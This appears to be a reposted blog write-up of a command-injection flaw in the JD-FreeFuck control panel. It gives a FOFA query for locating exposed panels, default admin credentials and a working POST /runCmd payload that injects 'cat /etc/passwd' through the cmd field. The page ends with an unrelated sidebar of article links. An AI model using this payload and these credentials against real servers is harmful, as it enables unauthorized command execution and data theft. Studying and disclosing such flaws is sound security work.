当前位置:网站首页>JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability
JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability
2022-04-23 18:05:00 【Lonely and lazy deed】
Vulnerability description
i
JD-FreeFuck There is a background Command Execution Vulnerability , Because the content is not filtered when the command is executed by passing parameters , Causes arbitrary commands to be executed , Control server Project address : https://github.com/meselson/JD-FreeFuck
Holes affect
s
JD-FreeFuck
Space mapping
d
FOFA:title=" Jingdong HaoMao control panel "
Loophole recurrence
- After visiting, the login page is as follows
- Default account
useradmin/supermanito
POST /runCmd HTTP/1.1
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
Personal blog
Lonely and lazy deed :https://gylq.gitee.io/time
版权声明
本文为[Lonely and lazy deed]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231804351608.html
边栏推荐
- Re regular expression
- k8s之实现redis一主多从动态扩缩容
- Logic regression principle and code implementation
- C#字节数组(byte[])和字符串相互转换
- NVIDIA Jetson: GStreamer and openmax (GST OMX) plug-ins
- Implementation of image recognition code based on VGg convolutional neural network
- .104History
- Svn simple operation command
- Re expression régulière
- YOLOv4剪枝【附代码】
猜你喜欢
随机推荐
Romance in C language
Correct opening method of option
C language to achieve 2048 small game direction merging logic
xlsxwriter. exceptions. Filecreateerror: [errno 13] permission denied
MySQL_ 01_ Simple data retrieval
journal
消费者灰度实现思路
YOLOv4剪枝【附代码】
C#的随机数生成
.104History
Crawl the product data of cicada mother data platform
The difference between deep copy and shallow copy
读取excel,int 数字时间转时间
I/O多路复用及其相关详解
Calculation of fishing net road density
Selenium + phantom JS crack sliding verification 2
Array rotation
Logic regression principle and code implementation
Laser slam theory and practice of dark blue College Chapter 3 laser radar distortion removal exercise
Eigen learning summary